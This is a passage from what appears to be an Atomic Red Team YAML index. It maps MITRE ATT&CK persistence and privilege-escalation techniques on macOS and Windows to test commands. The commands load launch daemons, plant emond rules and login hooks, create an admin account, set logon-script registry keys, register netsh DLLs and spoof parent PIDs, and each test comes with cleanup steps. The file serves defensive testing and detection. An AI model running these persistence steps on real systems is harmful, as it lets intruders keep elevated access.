https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html + description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved + July 10, 2017. + source_name: AppleDocs Launch Agent Daemons + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf + description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical + OS X Malware Detection & Analysis. Retrieved July 10, 2017.' + source_name: OSX Malware Detection + - url: https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf + description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. + Retrieved July 10, 2017.' + source_name: WireLurker + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Launch Daemon + description: "Adversaries may create or modify launch daemons to repeatedly + execute malicious payloads as part of persistence. Per Apple’s developer documentation, + when macOS and OS X boot up, launchd is run to finish system initialization. + This process loads the parameters for each launch-on-demand system-level daemon + from the property list (plist) files found in /System/Library/LaunchDaemons + and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent + Daemons). These LaunchDaemons have property list files which point to the + executables that will be launched (Citation: Methods of Mac Malware Persistence). + \n\nAdversaries may install a new launch daemon that can be configured to + execute at startup by using launchd or launchctl to load a plist into the + appropriate directories (Citation: OSX Malware Detection). The daemon name + may be disguised by using a name from a related operating system or benign + software (Citation: WireLurker). Launch Daemons may be created with administrator + privileges, but are executed under root privileges, so an adversary may also + use a service to escalate privileges from administrator to root. \n\nThe plist + file permissions must be root:wheel, but the script or program that it points + to has no such requirement. So, it is possible for poor configurations to + allow an adversary to modify a current Launch Daemon’s executable and gain + persistence or Privilege Escalation. " + id: attack-pattern--573ad264-1371-4ae0-8482-d2673b719dba + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-09-16T15:46:44.130Z' + created: '2020-01-17T19:23:15.227Z' + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Service: Service Creation' + - 'Service: Service Modification' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - root + x_mitre_permissions_required: + - Administrator + x_mitre_detection: 'Monitor for launch daemon creation or modification through + plist files and utilities such as Objective-See''s KnockKnock application. ' + x_mitre_platforms: + - macOS + identifier: T1543.004 + atomic_tests: + - name: Launch Daemon + auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf + description: 'Utilize LaunchDaemon to launch `Hello World` + +' + supported_platforms: + - macos + input_arguments: + plist_filename: + description: filename + type: string + default: com.atomicredteam.plist + path_malicious_plist: + description: Name of file to store in cron folder + type: string + default: "$PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist" + dependency_executor_name: bash + dependencies: + - description: 'The shared library must exist on disk at specified location + (#{path_malicious_plist}) + +' + prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and + try again."; exit 1; + +' + executor: + name: bash + elevation_required: true + command: | + sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename} + sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename} + cleanup: | + sudo launchctl unload /Library/LaunchDaemons/#{plist_filename} + sudo rm /Library/LaunchDaemons/#{plist_filename} + T1053.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1053.004 + url: https://attack.mitre.org/techniques/T1053/004 + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html + description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved + July 10, 2017. + source_name: AppleDocs Launch Agent Daemons + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Launchd + description: |- + Adversaries may abuse the Launchd daemon to perform task scheduling for initial or recurring execution of malicious code. The launchd daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence). + + An adversary may use the launchd daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. launchd can also be abused to run a process under the context of a specified account. Daemons, such as launchd, run with the permissions of the root user account, and will operate regardless of which user account is logged in. + id: attack-pattern--8faedf87-dceb-4c35-b2a2-7286f59a3bc3 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-23T22:41:14.739Z' + created: '2019-12-03T14:15:27.452Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_remote_support: false + x_mitre_permissions_required: + - root + x_mitre_detection: "Monitor scheduled task creation from common utilities using + command-line invocation. Legitimate scheduled tasks may be created during + installation of new software or through system administration functions. Look + for changes to tasks that do not correlate with known software, patch cycles, + etc. \n\nSuspicious program execution through scheduled tasks may show up + as outlier processes that have not been seen before when compared against + historical data. Data and events should not be viewed in isolation, but as + part of a chain of behavior that could lead to other activities, such as network + connections made for Command and Control, learning details about the environment + through Discovery, and Lateral Movement." + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_platforms: + - macOS + identifier: T1053.004 + atomic_tests: + - name: Event Monitor Daemon Persistence + auto_generated_guid: 11979f23-9b9d-482a-9935-6fc9cd022c3e + description: "This test adds persistence via a plist to execute via the macOS + Event Monitor Daemon. \n" + supported_platforms: + - macos + input_arguments: + script_location: + description: evil plist location + type: path + default: "$PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist" + script_destination: + description: Path where to move the evil plist + type: path + default: "/etc/emond.d/rules/atomicredteam_T1053_004.plist" + empty_file: + description: Random name of the empty file used to trigger emond service + type: string + default: randomflag + executor: + name: bash + elevation_required: true + command: | + sudo cp #{script_location} #{script_destination} + sudo touch /private/var/db/emondClients/#{empty_file} + cleanup_command: | + sudo rm #{script_destination} + sudo rm /private/var/db/emondClients/#{empty_file} + T1078.003: + technique: + id: attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2 + description: "Adversaries may obtain and abuse credentials of a local account + as a means of gaining Initial Access, Persistence, Privilege Escalation, or + Defense Evasion. Local accounts are those configured by an organization for + use by users, remote support, services, or for administration on a single + system or service.\n\nLocal Accounts may also be abused to elevate privileges + and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). + Password reuse may allow the abuse of local accounts across a set of machines + on a network for the purposes of Privilege Escalation and Lateral Movement. " + name: Local Accounts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1078.003 + url: https://attack.mitre.org/techniques/T1078/003 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2021-04-05T12:51:00.663Z' + created: '2020-03-13T20:26:46.695Z' + x_mitre_platforms: + - Linux + - macOS + - Windows + - Containers + x_mitre_data_sources: + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + x_mitre_detection: Perform regular audits of local system accounts to detect + accounts that may have been created by an adversary for persistence. Look + for suspicious account behavior, such as accounts logged in at odd times or + outside of business hours. + x_mitre_permissions_required: + - Administrator + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' + identifier: T1078.003 + atomic_tests: + - name: Create local account with admin priviliges + auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15 + description: After execution the new account will be active and added to the + Administrators group + supported_platforms: + - windows + executor: + command: |- + net user art-test /add + net user art-test Password123! + net localgroup administrators art-test /add + cleanup_command: |- + net localgroup administrators art-test /delete >nul 2>&1 + net user art-test /delete >nul 2>&1 + name: command_prompt + elevation_required: true + T1037.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1037.002 + url: https://attack.mitre.org/techniques/T1037/002 + - url: https://support.apple.com/de-at/HT2420 + description: 'Apple. (2011, June 1). Mac OS X: Creating a login hook. Retrieved + July 17, 2017.' + source_name: creating login hook + - source_name: S1 macOs Persistence + url: https://www.sentinelone.com/blog/how-malware-persists-on-macos/ + description: Stokes, P. (2019, July 17). How Malware Persists on macOS. Retrieved + March 27, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Logon Script (Mac) + description: "Adversaries may use macOS logon scripts automatically executed + at logon initialization to establish persistence. macOS allows logon scripts + (known as login hooks) to be executed whenever a specific user logs into a + system. A login hook tells Mac OS X to execute a certain script when a user + logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), + a login hook executes as the elevated root user.(Citation: creating login + hook)\n\nAdversaries may use these login hooks to maintain persistence on + a single system.(Citation: S1 macOs Persistence) Access to login hook scripts + may allow an adversary to insert additional malicious code. There can only + be one login hook at a time though and depending on the access configuration + of the hooks, either local credentials or an administrator account may be + necessary. " + id: attack-pattern--43ba2b05-cf72-4b6c-8243-03a4aba41ee0 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-27T16:49:15.786Z' + created: '2020-01-10T16:01:15.995Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_detection: Monitor logon scripts for unusual access by abnormal users + or at abnormal times. Look for files added or modified by unusual accounts + outside of normal administration duties. Monitor running process for actions + that could be indicative of abnormal programs or executables running upon + logon. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_platforms: + - macOS + identifier: T1037.002 + atomic_tests: + - name: Logon Scripts - Mac + auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 + description: 'Mac logon script + +' + supported_platforms: + - macos + executor: + steps: "1. Create the required plist file\n\n sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist\n\n2. + Populate the plist with the location of your shell script\n\n sudo defaults + write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n\n3. + Create the required plist file in the target user's Preferences directory\n\n\t + \ touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist\n\n4. + Populate the plist with the location of your shell script\n\n\t defaults + write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n" + name: manual + T1037.001: + technique: + id: attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3 + description: "Adversaries may use Windows logon scripts automatically executed + at logon initialization to establish persistence. Windows allows logon scripts + to be run whenever a specific user or group of users log into a system.(Citation: + TechNet Logon Scripts) This is done via adding a path to a script to the HKCU\\Environment\\UserInitMprLogonScript + Registry key.(Citation: Hexacorn Logon Scripts)\n\nAdversaries may use these + scripts to maintain persistence on a single system. Depending on the access + configuration of the logon scripts, either local credentials or an administrator + account may be necessary. " + name: Logon Script (Windows) + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1037.001 + url: https://attack.mitre.org/techniques/T1037/001 + - url: https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx + description: Microsoft. (2005, January 21). Creating logon scripts. Retrieved + April 27, 2016. + source_name: TechNet Logon Scripts + - source_name: Hexacorn Logon Scripts + url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/ + description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part + 18. Retrieved November 15, 2019. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-24T23:45:03.153Z' + created: '2020-01-10T03:43:37.211Z' + x_mitre_platforms: + - Windows + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Creation' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: |- + Monitor for changes to Registry values associated with Windows logon scrips, nameley HKCU\Environment\UserInitMprLogonScript. + + Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon. + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1037.001 + atomic_tests: + - name: Logon Scripts + auto_generated_guid: d6042746-07d4-4c92-9ad8-e644c114a231 + description: | + Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key + that can be viewed in the Registry Editor. + supported_platforms: + - windows + input_arguments: + script_path: + description: Path to .bat file + type: String + default: "%temp%\\art.bat" + script_command: + description: Command To Execute + type: String + default: echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037.001-log.txt + executor: + command: | + echo "#{script_command}" > #{script_path} + REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f + cleanup_command: | + REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1 + del #{script_path} >nul 2>&1 + del "%USERPROFILE%\desktop\T1037.001-log.txt" >nul 2>&1 + name: command_prompt + T1134.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1134.003 + url: https://attack.mitre.org/techniques/T1134/003 + - url: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing + description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved + April 21, 2017. + source_name: Microsoft Command-line Logging + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Make and Impersonate Token + description: Adversaries may make and impersonate tokens to escalate privileges + and bypass access controls. If an adversary has a username and password but + the user is not logged onto the system, the adversary can then create a logon + session for the user using the LogonUser function. The function + will return a copy of the new session's access token and the adversary can + use SetThreadToken to assign the token to a thread. + id: attack-pattern--8cdeb020-e31e-4f88-a582-f53dcfbda819 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-02-18T18:03:37.481Z' + created: '2020-02-18T18:03:37.481Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - SYSTEM + x_mitre_permissions_required: + - Administrator + - User + x_mitre_defense_bypassed: + - Windows User Account Control + - System access controls + - File system access controls + x_mitre_detection: |- + If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging) + + If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. + + Analysts can also monitor for use of Windows APIs such as LogonUser and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators. + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Command: Command Execution' + x_mitre_platforms: + - Windows + atomic_tests: [] + T1546.007: + technique: + created: '2020-01-24T14:26:51.207Z' + modified: '2020-03-24T18:28:07.793Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + type: attack-pattern + id: attack-pattern--f63fe421-b1d1-45c0-b8a7-02cd16ff2bed + description: |- + Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh. + + Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence) + name: Netsh Helper DLL + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1546.007 + url: https://attack.mitre.org/techniques/T1546/007 + - url: https://technet.microsoft.com/library/bb490939.aspx + description: Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017. + source_name: TechNet Netsh + - url: https://github.com/outflankbv/NetshHelperBeacon + description: Smeets, M. (2016, September 26). NetshHelperBeacon. Retrieved + February 13, 2017. + source_name: Github Netsh Helper CS Beacon + - url: https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html + description: Demaske, M. (2016, September 23). USING NETSHELL TO EXECUTE EVIL + DLLS AND PERSIST ON A HOST. Retrieved April 8, 2017. + source_name: Demaske Netsh Persistence + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Matthew Demaske, Adaptforward + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'Module: Module Load' + x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes + in most environments. Monitor process executions and investigate any child + processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\SOFTWARE\Microsoft\Netsh + registry key for any new or suspicious entries that do not correlate with + known system files or benign software. (Citation: Demaske Netsh Persistence)' + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1546.007 + atomic_tests: + - name: Netsh Helper DLL Registration + auto_generated_guid: 3244697d-5a3a-4dfc-941c-550f69f91a4d + description: 'Netsh interacts with other operating system components using dynamic-link + library (DLL) files + +' + supported_platforms: + - windows + input_arguments: + helper_file: + description: Path to DLL + type: Path + default: C:\Path\file.dll + executor: + command: 'netsh.exe add helper #{helper_file} + +' + name: command_prompt + T1037.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1037.003 + url: https://attack.mitre.org/techniques/T1037/003 + - source_name: Petri Logon Script AD + url: https://www.petri.com/setting-up-logon-script-through-active-directory-users-computers-windows-server-2008 + description: Daniel Petri. (2009, January 8). Setting up a Logon Script through + Active Directory Users and Computers in Windows Server 2008. Retrieved November + 15, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Network Logon Script + description: "Adversaries may use network logon scripts automatically executed + at logon initialization to establish persistence. Network logon scripts can + be assigned using Active Directory or Group Policy Objects.(Citation: Petri + Logon Script AD) These logon scripts run with the privileges of the user they + are assigned to. Depending on the systems within the network, initializing + one of these scripts could apply to more than one or potentially all systems. + \ \n \nAdversaries may use these scripts to maintain persistence on a network. + Depending on the access configuration of the logon scripts, either local credentials + or an administrator account may be necessary." + id: attack-pattern--c63a348e-ffc2-486a-b9d9-d7f11ec54d99 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-24T23:45:25.625Z' + created: '2020-01-10T18:01:03.666Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_detection: Monitor logon scripts for unusual access by abnormal users + or at abnormal times. Look for files added or modified by unusual accounts + outside of normal administration duties. Monitor running process for actions + that could be indicative of abnormal programs or executables running upon + logon. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Active Directory: Active Directory Object Modification' + x_mitre_platforms: + - Windows + atomic_tests: [] + T1134.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1134.004 + url: https://attack.mitre.org/techniques/T1134/004 + - source_name: DidierStevens SelectMyParent Nov 2009 + url: https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/ + description: 'Stevens, D. (2009, November 22). Quickpost: SelectMyParent or + Playing With the Windows Process Tree. Retrieved June 3, 2019.' + - source_name: Microsoft UAC Nov 2018 + url: https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works + description: Montemayor, D. et al.. (2018, November 15). How User Account + Control works. Retrieved June 3, 2019. + - source_name: CounterCept PPID Spoofing Dec 2018 + url: https://www.countercept.com/blog/detecting-parent-pid-spoofing/ + description: Loh, I. (2018, December 21). Detecting Parent PID Spoofing. Retrieved + June 3, 2019. + - source_name: CTD PPID Spoofing Macro Mar 2019 + url: https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/ + description: Tafani-Dereeper, C. (2019, March 12). Building an Office macro + to spoof parent processes and command line arguments. Retrieved June 3, + 2019. + - source_name: XPNSec PPID Nov 2017 + url: https://blog.xpnsec.com/becoming-system/ + description: Chester, A. (2017, November 20). Alternative methods of becoming + SYSTEM. Retrieved June 4, 2019. + - source_name: Microsoft Process Creation Flags May 2018 + url: https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags + description: Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags. + Retrieved June 4, 2019. + - description: Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2) + Ataware Ransomware Part 3. Retrieved June 6, 2019. + url: https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3 + source_name: Secuirtyinbits Ataware3 May 2019 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Parent PID Spoofing + description: |- + Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018) + + Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018) + + Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017) + id: attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-02-09T14:11:20.296Z' + created: '2020-02-18T18:22:41.448Z' + x_mitre_contributors: + - Wayne Silva, F-Secure Countercept + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_defense_bypassed: + - Heuristic Detection + - Host forensic analysis + x_mitre_detection: |- + Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018) + + Monitor and analyze API calls to CreateProcess/CreateProcessA, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of CreateProcess/CreateProcessA may also be proceeded by a call to UpdateProcThreadAttribute, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible. + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Process: Process Creation' + - 'Process: Process Metadata' + x_mitre_platforms: + - Windows + identifier: T1134.004 + atomic_tests: + - name: Parent PID Spoofing using PowerShell + auto_generated_guid: '069258f4-2162-46e9-9a25-c9c6c56150d2' + description: | + This test uses PowerShell to replicates how Cobalt Strike does ppid spoofing and masquerade a spawned process. + Upon execution, "Process C:\Program Files\Internet Explorer\iexplore.exe is spawned with pid ####" will be displayed and + calc.exe will be launched. + + Credit to In Ming Loh (https://github.com/countercept/ppid-spoofing/blob/master/PPID-Spoof.ps1) + supported_platforms: + - windows + input_arguments: + parent_process_name: + description: Name of the parent process + type: string + default: explorer + spawnto_process_path: + description: Path of the process to spawn + type: path + default: C:\Program Files\Internet Explorer\iexplore.exe + dll_process_name: + description: Name of the created process from the injected dll + type: string + default: calculator + dll_path: + description: Path of the dll to inject + type: path + default: PathToAtomicsFolder\T1134.004\bin\calc.dll + spawnto_process_name: + description: Name of the process to spawn + type: string + default: iexplore + dependency_executor_name: powershell + dependencies: + - description: 'DLL to inject must exist on disk at specified location (#{dll_path}) + +' + prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" + executor: + command: | + . $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 + $ppid=Get-Process #{parent_process_name} | select -expand id + PPID-Spoof -ppid $ppid -spawnto "#{spawnto_process_path}" -dllpath "#{dll_path}" + cleanup_command: | + Stop-Process -Name "#{dll_process_name}" -ErrorAction Ignore + Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore + name: powershell + - name: Parent PID Spoofing - Spawn from Current Process + auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25 + description: Spawns a powershell.exe process as a child of the current process. + supported_platforms: + - windows + input_arguments: + file_path: + description: File path or name of process to spawn + type: path + default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" + parent_pid: + description: PID of process to spawn from + type: string + default: "$PID" + command_line: + description: Specified command line to use + type: string + default: "-Command Start-Sleep 10" + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine + ''#{command_line}'' -ParentId #{parent_pid}' + name: powershell + - name: Parent PID Spoofing - Spawn from Specified Process + auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb + description: Spawns a notepad.exe process as a child of the current process. + supported_platforms: + - windows + input_arguments: + parent_pid: + description: PID of process to spawn from + type: string + default: "$PID" + test_guid: + description: Defined test GUID + type: string + default: 12345678-1234-1234-1234-123456789123 + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid + #{test_guid}' + name: powershell + - name: Parent PID Spoofing - Spawn from svchost.exe + auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591 + description: Spawnd a process as 